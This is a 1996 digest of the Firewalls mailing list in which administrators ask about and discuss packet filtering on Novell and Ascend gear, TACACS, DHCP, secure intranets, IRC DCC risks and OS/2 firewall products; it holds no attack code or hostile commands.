Fri, 5 Jul 1996 13:19:52 -0700 (PDT) Received: (from reis@localhost) by tigre.dc.ufscar.br (8.6.12/8.6.12) id RAA18067; Fri, 5 Jul 1996 17:17:52 -0300 Date: Fri, 5 Jul 1996 17:17:50 -0300 (EST) From: Christian Robottom Reis To: firewalls@greatcircle.com Subject: Novell 4.1 Router Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hey, Does anyone know of a way to filter out local ip numbers coming from the external network through a novell 4.1 gateway using the plain IP routing software included with netware 4.1? You can set up packet filtering with FILTCFG.NLM, but it doesn`t differentiate between incoming and outgoing packets, and just bases itself on pure IP addresses (i.e. block packets from IP address X to IP address Y on port Z). Thanx, C. ___________________________________________________________________________ So what? reis@dc.ufscar.br From firewalls-owner Fri Jul 5 14:34:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA10969 for firewalls-outgoing; Fri, 5 Jul 1996 14:30:24 -0700 (PDT) Received: from ram-exch-nm1.ramstein.af.mil (ws130032.ramstein.af.mil [132.25.130.32]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA10953 for ; Fri, 5 Jul 1996 14:30:17 -0700 (PDT) Received: by ram-exch-nm1.ramstein.af.mil with Microsoft Exchange (IMC 4.0.837.3) Message-ID: From: Crocker Sean SSgt 786CS/SCBM To: "'Firewalls@GreatCircle.COM'" Subject: Possible TACACS vulnerabilities? Date: Fri, 5 Jul 1996 23:31:20 +0200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, Does anyone know of any particular vulnerabilites with any of the TACACS flavors, besides the overt differences of cleartext versus encrypted authentication? In particular, how about port 65 for TACACS database service? TIA ---------------------------------------------- SSgt Sean S. Crocker Network Manager Ramstein AB GE sean.crocker@ramstein.af.mil TEL: (49) 6371-47-6723 DSN: 480-6723 From firewalls-owner Fri Jul 5 17:34:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA18438 for firewalls-outgoing; Fri, 5 Jul 1996 17:20:34 -0700 (PDT) Received: from norway.it.earthlink.net (norway-f.it.earthlink.net [206.85.92.49]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id RAA18424 for ; Fri, 5 Jul 1996 17:20:28 -0700 (PDT) Received: from 153.37.101.40 (pool040.Max4.San-Francisco.CA.DYNIP.ALTER.NET [153.37.101.40]) by norway.it.earthlink.net (8.7.5/8.7.3) with SMTP id UAA06952; Fri, 5 Jul 1996 20:14:17 -0400 (EDT) Message-ID: <31DDB05D.686F@earthlink.net> Date: Fri, 05 Jul 1996 17:16:28 -0700 From: "Todd Glassey, Consultant" Reply-To: tglassey@earthlink.net X-Mailer: Mozilla 3.0b5Gold (Macintosh; I; 68K) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM CC: Bill Stout Subject: Re: Secure Virtual Intranets References: <199607051923.MAA08347@osc.osc.hidata.com> Content-Type: text/plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk IMHO - Bill, is generally right, I have some specific commentary but like the idea of keeping the "autheticated" services inside the local FW so that traffic to and from them can be simply encrypted as part of a VPN architecture... As to the CA issues, hell x.509 and it's competitors are simple enough, roll your own for internal uses!. Bill Stout wrote: > > What are the most widely used methods to create Secure HTTP/FTP > Intranets over the Internet? > > I can think of just a few off the top of my head: > > 1. Encryted PC-Firewall links. > a. Webserver must be inside firewall, guests must also > pass through firewall. > b. You must pay for/install/support encryption software. > c. Complete (IP) protocol stack encryption/access. Use any of the commercial VPN based firewalls (SunScreen, Checkpoint, Raptor, Netcheck, etc...) . > > 2. Certificates on browser and server. > a. Webserver can be outside firewall. I disagree, If the traffic from the Web Server is destined for sites "ala Intranet" iot is much better to have this facility inside the firewall. Otherwise the Web server must have some sense of encryption or security services additional to it's own functionality. > b. No (additional) cost/support for client software Possibly true unless SKIP or some other layered security approach is used since this would mean an extra plug-in or layer particular to the specific implementation. > c. Security is based on physical browser, not user. Yes, sort of. > b. Certificates must be requested from Verisign/RSA, or > private certificates created via Xcert software > (http://www.xcert.com/). Not true of "Intranet" sites. Since the certificates are only to be used inside the Known Computing Base (or "internal" topology) this is one of the many instances where it makes sense to run a Mini C.A. for ones own purposes. > > 3. HTTPS. > a. Webserver can be outside firewall. > b. No (additional) cost/support for client software > b. Intranet Username/Password authentication managed > separately from network authentication. > c. Multiple Intranet servers also managed separately. > Not clean enough, IMHO. The overall "Security Paradigm" used should be a part of a networking operations plan. Thus to keep the external point of contact as homogeneous as possible is more cost effective from an ops standpoint. > Bill Stout > <=======10========20========30========40========50========60======== ---- SNIP ---- -- This email is from:: ------------------ Todd S. Glassey, Consultant (415) 324-4318 Email: tglassey@earthlink.com From firewalls-owner Fri Jul 5 21:05:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA27235 for firewalls-outgoing; Fri, 5 Jul 1996 21:02:29 -0700 (PDT) Received: from dollar.firstpac.com.au (firstpac.com.au [203.61.7.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id VAA27194 for ; Fri, 5 Jul 1996 21:02:15 -0700 (PDT) Received: from shekel.firstpac.com.au (shekel [203.61.14.12]) by dollar.firstpac.com.au (8.7.5/firstpac/0.99) with ESMTP id NAA21670; Sat, 6 Jul 1996 13:57:14 +1000 (EST) Received: (from matt@localhost) by shekel.firstpac.com.au (8.7.2/8.7.2/firstpac) id NAA00873; Sat, 6 Jul 1996 13:59:49 +1000 (EST) Message-Id: <199607060359.NAA00873@shekel.firstpac.com.au> Subject: Re: P50 summary To: gfm@readybox.com (Frank McCormick) Date: Sat, 6 Jul 1996 13:59:48 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <199607050452.VAA26650@angel.readybox.com> from "Frank McCormick" at Jul 4, 96 09:52:45 pm X-Ph: ph: +61 2 394 4320 fax: +61 2 394 4398 home: +61 2 9929 0717 X-Pgp: pub 2047/DFA91FA1 1996/05/01 Matthew Keenan X-Pgp: Key fingerprint = 36 09 88 84 FA 11 82 82 D7 E7 B8 23 6E B0 22 BB From: Matthew Keenan X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank McCormick wrote this... [snip] > Source-routed packets and the Ascend P50 > ---------------------------------------- [snip] > To be fair, Ascend's design choice -- kill before filtering -- is a > reasonable one. By definition, Ascend's static filtering rules are > ill equipped to deal sensibly with variable-length option data. > Source-routing options can, in practice, show up at differing > offsets in the packets, whereas an Ascend-style "generic" filter can > look only at fixed locations. ahh so then you could turn on something like IP record route and your filter wouldnt work anymore? (because the offsets are all "wrong") someone have the tools/time to test this? Matt -- Matthew Keenan Network Administrator First Pacific Stockbrokers Sydney, Australia From firewalls-owner Sat Jul 6 00:49:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA07454 for firewalls-outgoing; Sat, 6 Jul 1996 00:27:44 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id AAA07446 for firewalls@greatcircle.com; Sat, 6 Jul 1996 00:27:41 -0700 (PDT) Received: from dagon.megatoon.com (dagon.megatoon.com [205.205.31.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA17291 for ; Wed, 3 Jul 1996 11:13:12 -0700 (PDT) Received: from line108.megatoon.com (line108.megatoon.com [205.205.31.108]) by dagon.megatoon.com (8.6.12/8.6.12) with SMTP id OAA14207 for ; Wed, 3 Jul 1996 14:10:28 -0400 Message-ID: <31DAE11F.54B3@mat.ulaval.ca> Date: Wed, 03 Jul 1996 14:07:43 -0700 From: Martin Blouin X-Mailer: Mozilla 3.0b5Gold (Win16; I) MIME-Version: 1.0 To: Firewalls@greatcircle.com Subject: Help me (DHCP) Dynamic host configuration protocol Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please help me with the following questions: - DHCP it's safe to use with Internet and my network? - If so, what is the security level? - If i use DHCP so i need a FireWall to secur my network? note: i think use Netware/IP Thanks Martin Blouin From firewalls-owner Sat Jul 6 02:49:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA16467 for firewalls-outgoing; Sat, 6 Jul 1996 02:36:58 -0700 (PDT) Received: from gemsgw.med.ge.com (gemsgw.med.ge.com [192.88.230.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id CAA16419 for ; Sat, 6 Jul 1996 02:36:37 -0700 (PDT) From: sameer@wiproge.med.ge.com Received: from gemed.med.ge.com (gemed.med.ge.com [3.7.12.4]) by gemsgw.med.ge.com (8.6.12/8.6.12) with ESMTP id EAA21941; Sat, 6 Jul 1996 04:32:07 -0500 Received: from wiproge.med.ge.com (jogin [3.70.200.53]) by gemed.med.ge.com (8.6.12/8.6.12) with SMTP id EAA18948; Sat, 6 Jul 1996 04:34:14 -0500 Received: from everest.wiproge.med.ge.com (nilgiri) by wiproge.med.ge.com (4.1/SMI-4.1) Received: by wiproge.med.ge.com (5.0/SMI-SVR4) Date: Sat, 6 Jul 1996 15:08:28 +0500 Message-Id: <9607062008.AA24102@wiproge.med.ge.com> To: Firewalls@greatcircle.com, mblouin@mat.ulaval.ca Subject: Re: Help me (DHCP) Dynamic host configuration protocol X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Martin, Correct me if I am wrong but.... DHCP is a host naming protocol basically used so that u can dynamically change ip addresses for ur internal network and not need to update the hosts database.It has no security mechanism inbuilt for the web and so i think you will need a firewall to secure ur network... ...sam *SAM*From firewalls-owner@GreatCircle.COM Sat Jul 6 13:56:30 1996 *SAM*Date: Wed, 03 Jul 1996 14:07:43 -0700 *SAM*From: Martin Blouin *SAM*Mime-Version: 1.0 *SAM*To: Firewalls@greatcircle.com *SAM*Subject: Help me (DHCP) Dynamic host configuration protocol *SAM*Content-Transfer-Encoding: 7bit *SAM* *SAM*Please help me with the following questions: *SAM* *SAM* - DHCP it's safe to use with Internet and my network? *SAM* - If so, what is the security level? *SAM* - If i use DHCP so i need a FireWall to secur my network? *SAM* *SAM*note: i think use Netware/IP *SAM* *SAM*Thanks *SAM* *SAM* Martin Blouin *SAM* From firewalls-owner Sat Jul 6 09:34:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA29250 for firewalls-outgoing; Sat, 6 Jul 1996 09:29:26 -0700 (PDT) Received: from interlock.mgh.com (interlock.mgh.com [152.159.1.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA29243 for ; Sat, 6 Jul 1996 09:29:20 -0700 (PDT) From: dnewman@mcgraw-hill.com Received: by interlock.mgh.com id AA07751 Message-Id: <199607061626.AA07751@interlock.mgh.com> Received: by interlock.mgh.com (Protected-side Proxy Mail Agent-1); Date: Sat, 06 Jul 96 12:19:36 edt To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Actually, I'm not even sure their firewall really runs on OS/2. The Web page talks about OS/2 agents, which makes me wonder if it's really an NT firewall with a Socks-like client for OS/2. Has anyone actually touched Netguard's OS/2 code? dn >Date: Fri, 5 Jul 1996 15:54:47 -0500 >From: randy.witlicki@valley.net (Randy Witlicki) >Subject: RE: OS/2 firewalls? >> Check out Netguard at: >> >> http://www.netguard.com >> >> FW for both NT and OS/2 platforms. > Yikes ! I just looked at their web page and the >slogan there is: > "The Foolproof Internet Firewall System" > Take a deep breath and chant after me: > Computer Security is not Software. > Computer Security is not Hardware. > Computer Security is Wetware. >ObStory: I just finished up a System Admin contract and the >management there asked "Before you leave, could you do a >write-up of all the things you do, in case something goes wrong." - - Randy randy.witlicki@valley.net From firewalls-owner Sat Jul 6 09:49:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA29225 for firewalls-outgoing; Sat, 6 Jul 1996 09:27:34 -0700 (PDT) Received: from Grosses-Raetsel-Tor.GeNUA.DE (Grosses-Raetsel-Tor.GeNUA.DE [193.141.169.26]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA29218 for ; Sat, 6 Jul 1996 09:27:27 -0700 (PDT) Received: (from smap@localhost) by Grosses-Raetsel-Tor.GeNUA.DE (8.6.12/8.6.12) id SAA21959; Sat, 6 Jul 1996 18:24:51 +0200 Received: from auryn.genua.de(192.109.217.42) by Grosses-Raetsel-Tor.GeNUA.DE via smap (V1.3) Received: from auryn.genua.de (localhost [127.0.0.1]) by auryn.genua.de (8.7.4/8.7.3) with ESMTP id SAA06359; Sat, 6 Jul 1996 18:24:42 +0200 (MET DST) Message-Id: <199607061624.SAA06359@auryn.genua.de> To: Bill Stout cc: firewalls@greatcircle.com Subject: Re: Secure Virtual Intranets MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <6356.836670279.1@auryn.genua.de> Date: Sat, 06 Jul 1996 18:24:39 +0200 From: Bernhard Schneck Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > [...] > 2. Certificates on browser and server. > a. Webserver can be outside firewall. > [...] > 3. HTTPS. > a. Webserver can be outside firewall. With these approaches, you make it hard for bad b0yzZ to get at your stuff through the web ... but why bother with http if they can possibly hack your server trough other ways? Best thing would be to put the server behind a firewall, but not on your internal secure net. Depending on your needs, this thing may be a simple filtering router (allow from any to server port 80, deny everything else), an additional interface on your normal firewall or a completely separate box. Also, typical encryption through any exportable software will be weak (this will probably be true for both http and ip encryption). Even though SSL uses 128 bit keys, accessing your data from outside the US will transmit 88 bits of the secret(?!) key in clear. If your stuff should *really* stay secret, put it in an envelope and snailmail it (and hope that noone in the post office is curious :-) YMMV \Bernhard. From firewalls-owner Sat Jul 6 09:55:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA29122 for firewalls-outgoing; Sat, 6 Jul 1996 09:21:37 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA29107 for ; Sat, 6 Jul 1996 09:21:29 -0700 (PDT) Received: from rwcooper.rc.toronto.on.ca ([207.6.29.232]) Received: by rwcooper.rc.toronto.on.ca with Microsoft Mail Message-ID: <01BB6B34.ACF79A00@rwcooper.rc.toronto.on.ca> From: Russ To: "Firewalls@greatcircle.com" Subject: RE: Help me (DHCP) Dynamic host configuration protocol Date: Sat, 6 Jul 1996 12:14:25 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Uh, well, sorry to correct you Sameer, but... DHCP is an extension of BOOTP, and it is designed to dynamically assign IP configuration information to a device. A device using DHCP sends out a broadcast looking for a DHCP server, the DHCP server responds with an IP address, subnet mask, domain name, etc... see RFC 1533, 1534, 1541, and 1542. DHCP is initiated using a UDP broadcast, so its not possible to force a particular DHCP server to respond. If the DHCP server is on the same segment as the client that does the broadcast, it is eligible to respond. Cisco and other router vendors have ways to get a DHCP broadcast requests across segments to a specific subnet or even a specific DHCP server, but because DHCP is broadcast based, this function is normally turned off on routers segments exposed to the Internet. There is normally no mechanism in clients for DHCP servers to force an update to the information the clients have previously received, and once the request broadcast has been responded, the client has no listening port running for DHCP, so its as secure as a static configuration (assuming the client hasn't had the DHCP request code modified). A "lease" parameter tells the client how long it may have the IP configuration for. At the first boot after the lease has expired, the client will automatically do a DHCP request again, possibly getting a different address than before. Although I'm not sure what you mean by security level, DHCP is normally contained to your own segment, so unless your Internet router is forwarding DHCP broadcasts (or all broadcasts) to the Internet the security risks are within your site. The question about whether or not you need a Firewall is a basic security question, do you have anything that needs to be protected? If you were setting up a lab of machines to surf the net, and they were separated from your in-house LANs, you might not need a Firewall at all if you consider them sacrificial. If, on the other hand, you question is about IP address translation, then yes, you would still need something to hide the IP addresses of your machines. DHCP itself does not provide a way to hide IP addresses, so you will have to give them Internet routable IP addresses (RFC 1918) if you want them to get to the Internet. Hope that makes things a little clearer for you. Cheers, Russ From firewalls-owner Sat Jul 6 10:49:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA05845 for firewalls-outgoing; Sat, 6 Jul 1996 10:35:04 -0700 (PDT) Received: from mark.allyn.com (mark.allyn.com [206.114.135.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA05838 for ; Sat, 6 Jul 1996 10:34:58 -0700 (PDT) Received: (from allyn@localhost) by mark.allyn.com (8.7.5/8.7) id KAA14790; Sat, 6 Jul 1996 10:37:11 -0700 (PDT) From: Mark Allyn 206-860-9454 Message-Id: <199607061737.KAA14790@mark.allyn.com> Subject: Re: Secure Virtual Intranets To: Bernhard_Schneck@GeNUA.DE (Bernhard Schneck) Date: Sat, 6 Jul 1996 10:37:10 -0700 (PDT) Cc: bill.stout@hidata.com, firewalls@GreatCircle.COM In-Reply-To: <199607061624.SAA06359@auryn.genua.de> from "Bernhard Schneck" at Jul 6, 96 06:24:39 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -> If your stuff should *really* stay secret, put it in an envelope and -> snailmail it (and hope that noone in the post office is curious :-) No. the best security is to use a bicycle messenger whom you can trust. It stays in one person's possesion for the entire trip and who is going to bother one of these folks anyways? Mark From firewalls-owner Sat Jul 6 11:49:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA09638 for firewalls-outgoing; Sat, 6 Jul 1996 11:39:50 -0700 (PDT) Received: from vpm.com (vpm.com [207.49.29.143]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA09631 for ; Sat, 6 Jul 1996 11:39:44 -0700 (PDT) Received: (from mcs@localhost) by vpm.com (8.6.12/8.6.12) id LAA26046 for firewalls@GreatCircle.COM; Sat, 6 Jul 1996 11:39:17 -0700 From: Mark Stout Message-Id: <199607061839.LAA26046@vpm.com> Subject: Installing a NT Web server on a firewall To: firewalls@GreatCircle.COM Date: Sat, 6 Jul 1996 11:39:16 -0700 (PDT) X-Mailer: ELM [version 2.4 PL24 ME8a] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi All: I'm new to this list, so if this has been discussed to ad nauseum, please forgive. I need to install an NT v3.51 server as a clients primary web server and incorporate it into their existing Internet access structure. That being a firewall to protect the corporate intranet and a proxy server for allowing internal access to the Internet. I'm wondering if there's any documentation that I can get that explains, in detail, how to setup a server to provide external access to the web server form the outside and access to the SMTP server while allowing internal access to the server for maintenance. I believe the web server should reside on the outside of the firewall. Internal access to the Internet in general is provided by a proxy server. My thinking is that externally speaking, I should be able to access the web server, fill out a form and send it to the SMTP gateway just like any other external mail coming in would routed. BTW, the internal mail system is Lotus's cc:Mail. What would be the best solution to allow external access to the server AND allow internal access to the server for maintenance while allow access to the SMTP server for sending processed forms, such as feedback forms. Thanks, Mark -- ========================================================================== Mark Stout | The Village Potpourri Mall: http://www.vpm.com/ ---------------+---------------------------------------------------------- VPM Enterprises; P.O.Box 6427; Folsom, CA 95763-6427 Secured Web Hosting and Secured Discussion Groups Secured Internet Sales, Marketing and Advertising Specialist ========================================================================== From firewalls-owner Sat Jul 6 13:34:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA13783 for firewalls-outgoing; Sat, 6 Jul 1996 13:26:11 -0700 (PDT) Received: from morebbs.com ([206.165.150.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA13776 for ; Sat, 6 Jul 1996 13:26:05 -0700 (PDT) From: meowmyx@morebbs.com Received: by morebbs.com Message-ID: <9607060928.0DATT00@morebbs.com> Organization: MORE BBS X-Mailer: TBBS/TIGER v1.0/PRIMP 1.56p Date: Sat, 06 Jul 96 09:28:04 Subject: Real world security To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Far away from the rarified world of theoretical security considerations on the firewalls list there exists a real world It is called corporate America A friend of mine works for a multinational corporation They get a news feed by FM radio to a NewsEdge server The connection remains secure because it is one way and nothing can get back over the radio People in the network log into the NewsEdge machine to browse the news feed Now a press company lets call it Afilliated Squeeze has come along with a grand idea They want to replace the FM radio link with a direct line from an OS2 server in their own network and to replace the NewsEdge server inside the multinational corporation with an OS2 server The Chief of Information Security in the multinational asked Affilliated Squeeze about the security features in their system Squeeze assured him their network and OS2 machines are secure and nobody can break in The Chief of IS asked them What specific security features does your network and the OS2 server have Squeeze said we will have to check and get back to you on that Now I dont want my buddy to be open to attack by the kinds of tools that are widely available because then he might change his passwords Can somebody give me an idea of what kind of security if any that Affilliated Squeeze might have in place MeOwMyX theDawgEatingCat From firewalls-owner Sat Jul 6 18:19:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA23837 for firewalls-outgoing; Sat, 6 Jul 1996 18:07:47 -0700 (PDT) Received: from okjunc.junction.net (okjunc.junction.net [199.166.227.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA23830 for ; Sat, 6 Jul 1996 18:07:42 -0700 (PDT) Received: from sidhe.memra.com (sidhe.memra.com [199.166.227.105]) by okjunc.junction.net (8.6.11/8.6.11) with SMTP id SAA05891 for ; Sat, 6 Jul 1996 18:07:24 -0700 Date: Sat, 6 Jul 1996 18:01:30 -0700 (PDT) From: Michael Dillon To: firewalls@GreatCircle.COM Subject: Re: Secure Virtual Intranets In-Reply-To: <199607061624.SAA06359@auryn.genua.de> Message-ID: Organization: Memra Software Inc. - Internet consulting MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 6 Jul 1996, Bernhard Schneck wrote: > If your stuff should *really* stay secret, put it in an envelope and > snailmail it (and hope that noone in the post office is curious :-) Actually, you should get it copied to microfilm, cut out the small piece of film with the message and carefully stick it under the stamp on an envelope with a trivial letter inside. Your correspondent can pry out the microfilm and read it at most public libraries. As they say, security is all about wetware and watching old spy movies :-) Michael Dillon ISP & Internet Consulting Memra Software Inc. Fax: +1-604-546-3049 http://www.memra.com E-mail: michael@memra.com From firewalls-owner Sun Jul 7 09:04:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA23322 for firewalls-outgoing; Sun, 7 Jul 1996 09:01:41 -0700 (PDT) Received: from relay.infogroup.iunet.it (relay.infogroup.iunet.it [192.106.17.222]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA23315 for ; Sun, 7 Jul 1996 09:01:33 -0700 (PDT) Received: from infogroup.infogroup.it (relay) by relay.infogroup.iunet.it (5.x/SMI-SVR4) Message-Id: <1.5.4.32.19960707160658.00665988@infogroup.it> X-Sender: ic-00006@infogroup.it X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 07 Jul 1996 18:06:58 +0200 To: firewalls@greatcircle.com From: Iacopo Mazzoni Subject: IRC and Firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all. I need your help. I use for IRC the program MIRC 4.0 32 bit for Windows 95. My provider have installed on server a firewall. In the beginning my MIRC was not ok with firewall, so , my provider have ability port 6667 in firewall and now my MIRC is ok, but my DCC commands (send and chat) are not ok because firewall cut this commands. What must my provider ability in firewall for the good function of DCC commands ? Thank You very much. __________________________________________________________________ Iacopo Mazzoni, e-mail mazzoni@infogroup.it c.o. Infogroup S.p.A. - Informatica e Servizi Telematici - Via Santelli 35, 50141 Firenze (Italia) Phone +39-55-4365505 Fax +39-55-4360784 http://www.infogroup.it __________________________________________________________________ From firewalls-owner Sun Jul 7 12:37:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA00659 for firewalls-outgoing; Sun, 7 Jul 1996 12:30:52 -0700 (PDT) Received: from lapsene.mii.lu.lv (lapsene.mii.lu.lv [159.148.60.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA00651 for ; Sun, 7 Jul 1996 12:30:45 -0700 (PDT) Received: (from uulda@localhost) by lapsene.mii.lu.lv (8.7.5/8.7.1) id WAA05162 for firewalls@greatcircle.com; Sun, 7 Jul 1996 22:28:09 +0300 (EET DST) X-Authentication-Warning: lapsene.mii.lu.lv: uulda set sender to lda!lda.gov.lv!uldis@lda.gov.lv using -f >Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92); Received: from lda by lapsene.mii.lu.lv; Sun, 7 Jul 1996 22:28 EET Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92); Received: by lda.gov.lv (FIDO2UU 1.92d [DOS]); To: firewalls@greatcircle.com From: Uldis Bojars Message-Id: <31E03DDB@lda.gov.lv> Subject: OS/2 firewall Date: Sun, 7 Jul 1996 18:44:43 +0200 Lines: 20 Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Saturday July 06 1996 16:19, dnewman@mcgraw-hill.com wrote to Uldis Bojars: d> Actually, I'm not even sure their firewall really runs on OS/2. d> The Web page talks about OS/2 agents, which makes me wonder if it's d> really an NT firewall with a Socks-like client for OS/2. Has anyone d> actually touched Netguard's OS/2 code? I just received a message from them telling that now trial version for OS/2 is available on the Web, too. I'm eager to try it. I think it must be like WinNT version. Has anyone touched it and can comment it? Uldis ¾ My life is still in BETA test. --- GoldED/386 3.00.Alpha1+ From firewalls-owner Sun Jul 7 13:49:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA03390 for firewalls-outgoing; Sun, 7 Jul 1996 13:32:48 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id NAA03383 for ; Sun, 7 Jul 1996 13:32:43 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id PAA12190; Sun, 7 Jul 1996 15:30:04 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id PAA01767; Sun, 7 Jul 1996 15:23:04 -0500 Received: by sonic.nmti.com; id AA06247; Sun, 7 Jul 1996 15:23:03 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607072023.AA06247@sonic.nmti.com.nmti.com> Subject: Re: IRC and Firewalls To: mazzoni@infogroup.iunet.it (Iacopo Mazzoni) Date: Sun, 7 Jul 1996 15:23:03 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <1.5.4.32.19960707160658.00665988@infogroup.it> from "Iacopo Mazzoni" at Jul 7, 96 06:06:58 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > but my DCC commands (send and chat) are not ok because firewall cut this > commands. Good. DCC is a humungous security risk. From firewalls-owner Sun Jul 7 14:20:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA05045 for firewalls-outgoing; Sun, 7 Jul 1996 14:14:36 -0700 (PDT) Received: from gatekeeper.nytimes.com (gatekeeper.nytimes.com [199.181.175.201]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA05033 for ; Sun, 7 Jul 1996 14:14:29 -0700 (PDT) Received: from mailgate.nytimes.com by gatekeeper.nytimes.com; (5.65/1.1.8.2/30Mar95-0352PM) Received: from localhost by mailgate.nytimes.com; (5.65/1.1.8.2/25Jul94-1134AM) Date: Sun, 7 Jul 1996 17:15:39 -0400 (EDT) From: Gordy Thompson To: Peter da Silva Cc: Iacopo Mazzoni , firewalls@GreatCircle.COM Subject: Re: IRC and Firewalls In-Reply-To: <9607072023.AA06247@sonic.nmti.com.nmti.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Do you think you could elaborate on this just a bit? In particular, assuming that there is a desire to relay IRC through a firewall (and without arguing the validity of that desire, for the moment at least), is there any approach that could be taken to reduce this risk, short of just not allowing it at all? On Sun, 7 Jul 1996, Peter da Silva wrote: > > but my DCC commands (send and chat) are not ok because firewall cut this > > commands. > > Good. DCC is a humungous security risk. > > -- Gordon T. Thompson gordy@nytimes.com Manager, Internet Services 212-556-1386 The New York Times fax: 212-556-1636 The Times and I have an arrangement: Neither of us speaks for the other. From firewalls-owner Sun Jul 7 14:49:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA05754 for firewalls-outgoing; Sun, 7 Jul 1996 14:42:55 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA05747 for ; Sun, 7 Jul 1996 14:42:49 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with 